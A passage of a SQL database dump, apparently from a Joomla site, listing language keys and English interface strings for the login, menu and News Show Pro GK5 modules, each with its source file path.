shown to enable self-registration for users.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.ini'),(2446,'MOD_LOGIN','Login','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.sys.ini'),(2447,'MOD_LOGIN_XML_DESCRIPTION','This module displays a username and password login form. It also displays a link to retrieve a forgotten password. If user registration is enabled (in Users > Manage > Options), another link will be shown to enable self-registration for users.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.sys.ini'),(2448,'MOD_LOGIN_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_login.sys.ini'),(2449,'MOD_MENU','Menu','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2450,'MOD_MENU_FIELD_ACTIVE_DESC','Select a menu item to always be used as the base for the menu display. You must set the Start Level to the same level or higher than the level of the base item. This will cause the module to be displayed on all assigned pages. If Current is selected the active item is used as the base. This causes the module to only display when the parent menu item is active.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2451,'MOD_MENU_FIELD_ACTIVE_LABEL','Base Item','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2452,'MOD_MENU_FIELD_ALLCHILDREN_DESC','Expand the menu and make its sub-menu items always visible.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2453,'MOD_MENU_FIELD_ALLCHILDREN_LABEL','Show Sub-menu Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2454,'MOD_MENU_FIELD_CLASS_DESC','A suffix to be applied to the CSS class of the menu items.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2455,'MOD_MENU_FIELD_CLASS_LABEL','Menu Class Suffix','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2456,'MOD_MENU_FIELD_ENDLEVEL_DESC','Level to stop rendering the menu at. If you choose \'All\', all levels will be shown depending on \'Show Sub-menu Items\' setting.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2457,'MOD_MENU_FIELD_ENDLEVEL_LABEL','End Level','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2458,'MOD_MENU_FIELD_MENUTYPE_DESC','Select a menu in the list.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2459,'MOD_MENU_FIELD_MENUTYPE_LABEL','Select Menu','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2460,'MOD_MENU_FIELD_STARTLEVEL_DESC','Level to start rendering the menu at. Setting the start and end levels to the same # and setting \'Show Sub-menu Items\' to yes will only display that single level.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2461,'MOD_MENU_FIELD_STARTLEVEL_LABEL','Start Level','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2462,'MOD_MENU_FIELD_TAG_ID_DESC','An ID attribute to assign to the root ul tag of the menu (optional).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2463,'MOD_MENU_FIELD_TAG_ID_LABEL','Menu Tag ID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2464,'MOD_MENU_FIELD_TARGET_DESC','JavaScript values to position a popup window, eg top=50, left=50, width=200, height=300.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2465,'MOD_MENU_FIELD_TARGET_LABEL','Target Position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2466,'MOD_MENU_XML_DESCRIPTION','This module displays a menu on the Frontend.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.ini'),(2467,'MOD_MENU','Menu','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.sys.ini'),(2468,'MOD_MENU_XML_DESCRIPTION','This module displays a menu on the Frontend.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.sys.ini'),(2469,'MOD_MENU_LAYOUT_DEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.mod_menu.sys.ini'),(2470,'MOD_NEWS_PRO_GK5','News Show Pro GK5','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2471,'COM_MODULES_NSP_BASIC_SETTINGS_FIELDSET_LABEL','Basic settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2472,'COM_MODULES_NSP_DATA_SOURCE_FIELDSET_LABEL','Data source','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2473,'COM_MODULES_NSP_DATA_SOURCE_COM_CONTENT_FIELDSET_LABEL','Joomla! Content Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2474,'COM_MODULES_NSP_DATA_SOURCE_COM_K2_FIELDSET_LABEL','K2 Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2475,'COM_MODULES_NSP_DATA_SOURCE_COM_EASYBLOG_FIELDSET_LABEL','Easy Blog Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2476,'COM_MODULES_NSP_DATA_SOURCE_COM_VIRTUEMART_FIELDSET_LABEL','VirtueMart Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2477,'COM_MODULES_NSP_DATA_SOURCE_COM_HIKASHOP_FIELDSET_LABEL','HikaShop Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2478,'COM_MODULES_NSP_DATA_SOURCE_RSS_FIELDSET_LABEL','RSS Additional Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2479,'COM_MODULES_NSP_ARTICLE_FORMAT_FIELDSET_LABEL','Article format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2480,'COM_MODULES_NSP_ARTICLE_LAYOUT_FIELDSET_LABEL','Article layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2481,'COM_MODULES_NSP_LINKS_LAYOUT_FIELDSET_LABEL','Links layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2482,'COM_MODULES_NSP_THUMBNAILS_FIELDSET_LABEL','Thumbnails','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2483,'COM_MODULES_NSP_ADDITIONAL_SETTINGS_FIELDSET_LABEL','Animation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2484,'COM_MODULES_NSP_EXTERNAL_FILES_FIELDSET_LABEL','External files','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2485,'COM_MODULES_NSP_CHECKOUT_FIELDSET_LABEL','Configuration check','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2486,'MOD_NEWS_PRO_GK5_NSP_PREV','Prev','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2487,'MOD_NEWS_PRO_GK5_NSP_NEXT','Next','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2488,'MOD_NEWS_PRO_GK5_NHITS','Hits:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2489,'MOD_NEWS_PRO_GK5_NSP_ERROR','Error: No articles to display','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2490,'MOD_NEWS_PRO_GK5_NSP_READMORE','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2491,'MOD_NEWS_PRO_GK5_NSP_RATE','Rate:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2492,'MOD_NEWS_PRO_GK5_1COMMENT','1 Comment','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2493,'MOD_NEWS_PRO_GK5_MORECOMMENTS','Comments','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2494,'MOD_NEWS_PRO_GK5_MUCHMORECOMMENTS','Comments','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2495,'MOD_NEWS_PRO_GK5_NO_COMMENTS','No comments','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2496,'MOD_NEWS_PRO_GK5_COMMENTS','Comments ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2497,'MOD_NEWS_PRO_GK5_1LIKE','1 Like','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2498,'MOD_NEWS_PRO_GK5_MORELIKES','Likes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2499,'MOD_NEWS_PRO_GK5_MUCHMORELIKES','Likes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2500,'MOD_NEWS_PRO_GK5_NO_LIKES','No likes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2501,'MOD_NEWS_PRO_GK5_LIKES','Likes ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2502,'MOD_NEWS_PRO_GK5_MANUFACTURER','Manufactured by:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2503,'MOD_NEWS_PRO_GK5_FEATURED','Featured','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2504,'MOD_NEWS_PRO_GK5_PRODUCT_BASEPRICE_WITHTAX','Base price with tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2505,'MOD_NEWS_PRO_GK5_PRODUCT_BASEPRICE_WITHOUTTAX','Base price without tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2506,'MOD_NEWS_PRO_GK5_PRODUCT_SALESPRICE','Sales price with tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2507,'MOD_NEWS_PRO_GK5_PRODUCT_SALESPRICE_WITHOUT_TAX','Sales price without tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2508,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_CART_ADD_TO','Add to cart','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2509,'MOD_NEWS_PRO_GK5_PRODUCT_DISCOUNT_AMOUNT','Discount: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2510,'MOD_NEWS_PRO_GK5_PRODUCT_TAX_AMOUNT','inc. tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2511,'MOD_NEWS_PRO_GK5_NSP_FEATURED','Featured','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2512,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_CART_ADD_TO','Add to cart','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2513,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_VIEW_PRODUCT','View product','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2514,'MOD_NEWS_PRO_GK5_MODCLASSSUFFIX','Module suffix','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2515,'MOD_NEWS_PRO_GK5_MODCLASSSUFFIX_DESC','Module suffix is used for getting other module styling','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2516,'MOD_NEWS_PRO_GK5_DISABLED','Disabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2517,'MOD_NEWS_PRO_GK5_ENABLED','Enabled','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2518,'MOD_NEWS_PRO_GK5_MODID','Module ID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2519,'MOD_NEWS_PRO_GK5_MODID_DESC','You can specify your own static module ID. If this option will be blank then the automatic module ID will be created using the following pattern: nsp-[MODULE ID] - where [MODULE ID] is the module ID in the database.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2520,'MOD_NEWS_PRO_GK5_NORMAL_MODE','Standard mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2521,'MOD_NEWS_PRO_GK5_MOD_MODE','Module mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2522,'MOD_NEWS_PRO_GK5_MOD_MODE_DESC','You can select module mode - standard mode is a normal mode of the News Show Pro module, any other modes are connected with Portal Mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2523,'MOD_NEWS_PRO_GK5_JOOMLA_CONTENT_TITLE','Joomla! Content (com_content)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2524,'MOD_NEWS_PRO_GK5_K2_CONTENT_TITLE','K2 Content (com_k2)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2525,'MOD_NEWS_PRO_GK5_EASYBLOG_CONTENT_TITLE','Easy Blog Content (com_easyblog)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2526,'MOD_NEWS_PRO_GK5_JSON_TITLE','JSON file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2527,'MOD_NEWS_PRO_GK5_XML_TITLE','XML file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2528,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_TITLE','VirtueMart','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2529,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_TITLE','HikaShop','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2530,'MOD_NEWS_PRO_GK5_RSS_TITLE','RSS','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2531,'MOD_NEWS_PRO_GK5_RSS_FEED','RSS feed','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2532,'MOD_NEWS_PRO_GK5_JOMSOCIAL_TITLE','JomSocial','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2533,'MOD_NEWS_PRO_GK5_SOLIDRES_CONTENT_TITLE','Solidres Content (com_solidres)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2534,'MOD_NEWS_PRO_GK5_DATA_SOURCE','Source of articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2535,'MOD_NEWS_PRO_GK5_DATA_SOURCE_DESC','Type of data source used for generating module content','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2536,'MOD_NEWS_PRO_GK5_COM_CONTENT_CATEGORIES','Joomla! categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2537,'MOD_NEWS_PRO_GK5_COM_CONTENT_ARTICLES','Joomla! articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2538,'MOD_NEWS_PRO_GK5_ALL_COM_CONTENT_ARTICLES','All Joomla! articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2539,'MOD_NEWS_PRO_GK5_COM_CONTENT_TAGS','Joomla! Tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2540,'MOD_NEWS_PRO_GK5_COM_CONTENT_TAGS_DESC','Tag from com_content component','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2541,'MOD_NEWS_PRO_GK5_ALL_COM_K2_ARTICLES','All K2 articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2542,'MOD_NEWS_PRO_GK5_COM_K2_ARTICLES','K2 articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2543,'MOD_NEWS_PRO_GK5_COM_K2_CATEGORIES','K2 categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2544,'MOD_NEWS_PRO_GK5_COM_K2_TAGS','K2 Tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2545,'MOD_NEWS_PRO_GK5_COM_K2_AUTHORS','K2 Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2546,'MOD_NEWS_PRO_GK5_JOMSOCIAL_LATEST_STATUS','JomSocial latest statuses','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2547,'MOD_NEWS_PRO_GK5_JOMSOCIAL_LATEST_PHOTO','JomSocial latest photos','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2548,'MOD_NEWS_PRO_GK5_JOMSOCIAL_USER_STATUS','JomSocial user(s) statuses','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2549,'MOD_NEWS_PRO_GK5_JOMSOCIAL_USER_PHOTO','JomSocial user(s) photos','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2550,'MOD_NEWS_PRO_GK5_ALL_COM_EASYBLOG_ARTICLES','All Easy Blog articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2551,'MOD_NEWS_PRO_GK5_COM_EASYBLOG_ARTICLES','Easy Blog articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2552,'MOD_NEWS_PRO_GK5_COM_EASYBLOG_CATEGORIES','Easy Blog categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2553,'MOD_NEWS_PRO_GK5_COM_EASYBLOG_TAGS','Easy Blog Tags','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2554,'MOD_NEWS_PRO_GK5_COM_EASYBLOG_AUTHORS','Easy Blog Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2555,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_PRODUCTS','VirtueMart Products','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2556,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_PRODUCTS_DESC','Specify the ID of the VirtueMart products to display separated with a comma (i.e. 1,2,3,4,5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2557,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_CATEGORIES','VirtueMart Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2558,'MOD_NEWS_PRO_GK5_COM_VIRTUEMART_CATEGORIES_DESC','Select the VirtueMart categories to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2559,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_PRODUCTS','HikaShop Products','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2560,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_PRODUCTS_DESC','Specify the ID of the HikaShop products to display separated with a comma (i.e. 1,2,3,4,5).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2561,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_CATEGORIES','HikaShop Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2562,'MOD_NEWS_PRO_GK5_COM_HIKASHOP_CATEGORIES_DESC','Select the HikaShop categories to display.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2563,'MOD_NEWS_PRO_GK5_ALL_COM_SOLIDRES_HOTELS','All Solidres assets','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2564,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_HOTELS','Solidres selected assets','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2565,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_HOTELS_DESC','List of asset IDs separated by comma','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2566,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_HOTEL_CATEGORIES','Solidres assets categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2567,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_ALL_ROOMS','All Solidres rooms','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2568,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_ROOMS','Solidres selected rooms','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2569,'MOD_NEWS_PRO_GK5_COM_SOLIDRES_ROOMS_DESC','List of room IDs separated by comma','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2570,'MOD_NEWS_PRO_GK5_RSS_FEED_URL','RSS feed URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2571,'MOD_NEWS_PRO_GK5_RSS_FEED_URL_DESC','Specify the URL of used RSS feed','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2572,'MOD_NEWS_PRO_GK5_JOMSOCIAL_USERS','JomSocial Users','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2573,'MOD_NEWS_PRO_GK5_JOMSOCIAL_USERS_DESC','Comma separated list of JomSocial user IDs i.e. 123,654,789','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2574,'MOD_NEWS_PRO_GK5_COM_CATEGORIES','Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2575,'MOD_NEWS_PRO_GK5_COM_CATEGORIES_DESC','Categories from Joomla!','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2576,'MOD_NEWS_PRO_GK5_K2_CATEGORIES','K2 Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2577,'MOD_NEWS_PRO_GK5_K2_ARTICLES','K2 Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2578,'MOD_NEWS_PRO_GK5_ALL_K2_ARTICLES','All K2 Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2579,'MOD_NEWS_PRO_GK5_COM_ARTICLES','Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2580,'MOD_NEWS_PRO_GK5_K2CATEGORIES','K2 Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2581,'MOD_NEWS_PRO_GK5_K2CATEGORIES_DESC','Categories from K2 component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2582,'MOD_NEWS_PRO_GK5_K2ITEMS','K2 Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2583,'MOD_NEWS_PRO_GK5_K2ITEMS_DESC','Articles from K2 component. It should be a list of article IDs separated with a comma (i.e. 1,2,3,4,5)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2584,'MOD_NEWS_PRO_GK5_K2_TAGS','K2 Tag','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2585,'MOD_NEWS_PRO_GK5_K2_TAGS_DESC','Tag from K2 component','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2586,'MOD_NEWS_PRO_GK5_K2_AUTHORS','K2 Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2587,'MOD_NEWS_PRO_GK5_K2_AUTHORS_DESC','Authors from K2 component. This list displays only authors with at least one article','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2588,'MOD_NEWS_PRO_GK5_EASYBLOG_CATEGORIES','Easy Blog Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2589,'MOD_NEWS_PRO_GK5_EASYBLOG_ARTICLES','Easy Blog Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2590,'MOD_NEWS_PRO_GK5_ALL_EASYBLOG_ARTICLES','All Easy Blog Articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2591,'MOD_NEWS_PRO_GK5_EASYBLOGCATEGORIES','Easy Blog Categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2592,'MOD_NEWS_PRO_GK5_EASYBLOGCATEGORIES_DESC','Categories from Easy Blog component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2593,'MOD_NEWS_PRO_GK5_EASYBLOGITEMS','Easy Blog Items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2594,'MOD_NEWS_PRO_GK5_EASYBLOGITEMS_DESC','Articles from Easy Blog component. It should be a list of article IDs separated with a comma (i.e. 1,2,3,4,5)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2595,'MOD_NEWS_PRO_GK5_EASYBLOG_TAGS','Easy Blog Tag','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2596,'MOD_NEWS_PRO_GK5_EASYBLOG_TAGS_DESC','Tag from Easy Blog component','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2597,'MOD_NEWS_PRO_GK5_EASYBLOG_AUTHORS','Easy Blog Authors','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2598,'MOD_NEWS_PRO_GK5_EASYBLOG_AUTHORS_DESC','Authors from Easy Blog component. This list displays only authors with at least one article','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2599,'MOD_NEWS_PRO_GK5_COM_ARTICLES_DESC','Articles from Joomla! It should be a list of article IDs separated with a comma (i.e. 1,2,3,4,5)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2600,'MOD_NEWS_PRO_GK5_NEWS_SORT_VALUE','News order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2601,'MOD_NEWS_PRO_GK5_NEWS_SORT_VALUE_DESC','Order type for articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2602,'MOD_NEWS_PRO_GK5_DATE','By date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2603,'MOD_NEWS_PRO_GK5_PUBLISH_UP','By publish up date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2604,'MOD_NEWS_PRO_GK5_PUBLISH_DOWN','By publish down date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2605,'MOD_NEWS_PRO_GK5_MODIFIED','By modification date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2606,'MOD_NEWS_PRO_GK5_TITLE','By title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2607,'MOD_NEWS_PRO_GK5_ORDER','By order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2608,'MOD_NEWS_PRO_GK5_RANDOM','Random order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2609,'MOD_NEWS_PRO_GK5_HITS','By hits amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2610,'MOD_NEWS_PRO_GK5_RATING','By rating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2611,'MOD_NEWS_PRO_GK5_USER_INPUT','By user input','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2612,'MOD_NEWS_PRO_GK5_NEWS_SORT_ORDER','News sort order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2613,'MOD_NEWS_PRO_GK5_NEWS_SORT_ORDER_DESC','Direction of ordering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2614,'MOD_NEWS_PRO_GK5_ASC','Ascending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2615,'MOD_NEWS_PRO_GK5_DESC','Descending','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2616,'MOD_NEWS_PRO_GK5_NEWS_SINCE','Show article created after','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2617,'MOD_NEWS_PRO_GK5_NEWS_SINCE_DESC','Leave this field blank if you don\'t want to limit articles by period of time.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2618,'MOD_NEWS_PRO_GK5_NEWS_IN','Show article created in last X 